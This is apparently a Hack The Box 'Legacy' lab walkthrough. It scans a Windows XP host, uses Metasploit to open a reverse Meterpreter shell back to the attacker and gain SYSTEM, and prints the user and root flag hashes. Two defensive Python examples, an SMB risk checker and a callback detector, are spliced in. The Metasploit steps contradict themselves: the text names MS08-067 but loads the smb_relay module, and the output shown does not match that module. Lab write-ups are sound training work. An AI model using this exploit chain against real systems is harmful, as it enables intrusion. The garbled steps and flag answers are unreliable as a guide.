HTB Walkthrough: Legacy
Initial Scanning
Let’s run our port scanner to identify active TCP services.
TCP Port Scan
Start a full all-ports TCP scan with service and OS detection, saving the output to a log; the saved results are shown below:
$ cat nmap_full.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-02 04:07 EDT
Warning: 10.10.10.4 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.4
Host is up (0.080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Aggressive OS guesses: Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows XP SP3 (95%), Microsoft Windows 2003 SP2 (94%), Microsoft Windows Server 2003 SP1 (94%), Microsoft Windows Server 2003 SP1 or SP2 (94%), Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (92%), Microsoft Windows XP Professional SP2 or Windows Server 2003 (92%), Microsoft Windows XP SP2 or SP3, or Windows Embedded Standard 2009 (92%), Microsoft Windows XP SP2 - SP3 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b962df (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2023-04-07T13:09:37+03:00
Right off the bat, we see an outdated OS and SMB1-only service (the SMB2 negotiation failed), with smb-os-discovery reporting Windows XP (Windows 2000 LAN Manager) and SMB message signing disabled.
This box is screaming “MS08-067”, the October 2008 Server Service relative path stack corruption listed in the Metasploit search output below.
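The host-script section of that scan is where a defender's attention should go, so here is an added example (not part of the original walkthrough) that parses Nmap's `|`-prefixed script output and flags the three indicators the scan above exposes: an end-of-life OS reported over SMB, SMB1-only negotiation, and disabled message signing. The sample text is a constructed excerpt in the same shape as the scan output; the end-of-life OS list is an assumption to maintain for your own environment.

```python
"""Flag SMB risk indicators in Nmap host-script output (added example)."""
import re

# Constructed sample: host-script lines trimmed to what the checks use.
SAMPLE = """\
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|_  System time: 2023-04-07T13:09:37+03:00
"""

# Assumption: OS families that no longer receive security updates.
EOL_OS_PATTERNS = [r"windows xp", r"windows 2000", r"windows server 2003"]


def parse_host_scripts(text):
    """Return {script_name: {key: value}} from Nmap's script output.

    One-line scripts ("|_smb2-time: ...") are stored under the key "value".
    Multi-line scripts start with a header ("| smb-os-discovery:") and end
    at the line that starts with "|_".
    """
    scripts, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                       # not part of a script block
        closes = raw.startswith("|_")      # "|_" marks a script's last line
        body = raw[1:].lstrip("_").strip()
        if not body:
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if current is None:
            if value:                      # one-line script
                scripts[key] = {"value": value}
            else:                          # header opening a multi-line script
                current = key
                scripts[current] = {}
        else:
            scripts[current][key] = value  # nested key inside the open script
            if closes:
                current = None
    return scripts


def assess(scripts):
    """Return a list of findings a defender should act on."""
    findings = []
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    if any(re.search(p, os_name, re.I) for p in EOL_OS_PATTERNS):
        findings.append(f"end-of-life OS reported over SMB: {os_name}")
    smb2 = scripts.get("smb2-time", {}).get("value", "")
    if "negotiation failed" in smb2.lower():
        findings.append("SMB2 negotiation failed: host speaks SMB1 only")
    signing = scripts.get("smb-security-mode", {}).get("message_signing", "")
    if signing.lower().startswith("disabled"):
        findings.append("SMB message signing disabled: exposed to relay attacks")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_host_scripts(SAMPLE)):
        print("FINDING:", finding)
```

Feed it the host-script portion of a saved scan (or run it over every host block of a larger log) and any host with a non-empty result belongs on the patch-or-decommission list; an SMB1-only host is a sign of a system that cannot be brought current at all.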
Initial Access
To save time, I ran the exploit in msfconsole, easily and quickly gaining initial access to the Windows machine.
$ msfconsole
$ search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
1 exploit/windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution
2 exploit/windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption
3 auxiliary/admin/ms/ms08_059_his2006 2008-10-14 normal No Microsoft Host Integration Server 2006 Command Execution Vulnerability
4 exploit/windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
5 exploit/windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
6 exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
7 auxiliary/fileformat/multidrop normal No Windows SMB Multi Dropper
$ use 1
msf6 exploit(windows/smb/smb_relay) > options
Module options (exploit/windows/smb/smb_relay):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no Name of file to store Cain&Abel hashes in. Only supports NTLMv1 hashes. Can be a path.
JOHNPWFILE no Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can also be a path.
RELAY_TARGETS yes Target address range or CIDR identifier to relay to
RELAY_TIMEOUT 25 yes Seconds that the relay socket will wait for a response after the client has initiated communication.
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain WORKGROUP yes The domain name used during SMB exchange.
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 445 yes The local port to listen on.
SRV_TIMEOUT 25 yes Seconds that the server socket will wait for a response after the client has initiated communication.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.86 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
$ set rhosts 10.10.10.4
$ set lhost tun0
$ run
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.4:1032) at 2023-04-02 04:30:31 -0400
$ shell
Success! The first thing I tried was checking for a hostname and username (with whoami). The hostname returned as LEGACY but “whoami” was not a recognized command.
To fix this, I remembered that Kali has a copy of whoami.exe in /usr/share/windows-binaries/.
Metasploit made the upload of this file easy with its “upload” command. Since I had run “shell” after gaining a session to make it interactive, we first had to exit it with CTRL+Z.
After hitting CTRL+Z we could upload a file directly to the Windows machine by using the ‘upload’ meterpreter command.
$ upload /usr/share/windows-binaries/whoami.exe
Now, we can re-gain our interactive shell with the “shell” command and all that’s left to do is run the executable.
$ shell
C:\WINDOWS\system32>whoami.exe
whoami.exe
NT AUTHORITY\SYSTEM
We are already ROOT! Hooray.
Let’s just grab our flags, at this point.
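From the defender's side, the session log above has a distinctive shape: an inbound connection to the server's port 445 followed seconds later by the server itself opening a connection back to the same peer on an unexpected port (10.10.10.4:1032 to 10.10.14.7:4444). The following added example, which is not part of the original walkthrough, runs that pairing logic over constructed flow records; the monitored-server set, the expected egress ports and the five-minute window are assumptions to tune per environment.

```python
"""Pair inbound SMB connections with callback connections to the same peer
(added detection example; the flow records are constructed)."""
from datetime import datetime, timedelta

# Constructed flow records, "time src:sport -> dst:dport", echoing the
# addresses in the session log. 10.10.10.4 is the server under watch.
FLOWS = """\
2023-04-02T04:30:20 10.10.14.7:49812 -> 10.10.10.4:445
2023-04-02T04:30:31 10.10.10.4:1032 -> 10.10.14.7:4444
2023-04-02T04:31:02 10.10.10.4:1033 -> 10.10.10.2:53
2023-04-02T04:35:00 10.10.10.9:50000 -> 10.10.10.4:445
"""

MONITORED_SERVERS = {"10.10.10.4"}                    # assumption
EXPECTED_OUTBOUND_PORTS = {53, 80, 88, 123, 389, 443}  # assumption: normal egress
WINDOW = timedelta(minutes=5)                         # assumption: pairing window


def parse_flows(text):
    """Return (timestamp, src_ip, src_port, dst_ip, dst_port) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _, dst = line.split()
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        flows.append((datetime.fromisoformat(ts), sip, int(sport), dip, int(dport)))
    return flows


def find_smb_callbacks(flows):
    """Alert when a monitored server connects back to a peer that had just
    connected to its port 445, on a port outside the expected egress set."""
    alerts = []
    last_inbound = {}  # (server, peer) -> time of the most recent inbound SMB
    for ts, sip, sport, dip, dport in sorted(flows):
        if dip in MONITORED_SERVERS and dport == 445:
            last_inbound[(dip, sip)] = ts
        elif sip in MONITORED_SERVERS and dport not in EXPECTED_OUTBOUND_PORTS:
            seen = last_inbound.get((sip, dip))
            if seen is not None and ts - seen <= WINDOW:
                alerts.append({
                    "server": sip,
                    "peer": dip,
                    "port": dport,
                    "delay_s": (ts - seen).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_smb_callbacks(parse_flows(FLOWS)):
        print("ALERT: SMB client became callback target:", alert)
```

The DNS flow and the second SMB client that never receives a callback produce nothing, so the rule stays quiet on ordinary traffic; the one alert names the peer, the callback port and the eleven-second gap between the SMB connection and the reverse session, which is enough to pivot into packet captures or host logs for that window.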
Grabbing Flags
cd C:\
C:\>cd "Documents and Settings"
C:\Documents and Settings>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 πμ <DIR> .
16/03/2017 09:07 πμ <DIR> ..
16/03/2017 09:07 πμ <DIR> Administrator
16/03/2017 08:29 πμ <DIR> All Users
16/03/2017 08:33 πμ <DIR> john
cd Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d258b0e0ec917cae9e695d5713
Now just to grab the user flag.
cd ../../john/Desktop
C:\Documents and Settings\john\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 πμ <DIR> .
16/03/2017 09:19 πμ <DIR> ..
16/03/2017 09:19 πμ 32 user.txt
C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4f443de7e36876fda4ec7644f
Voila.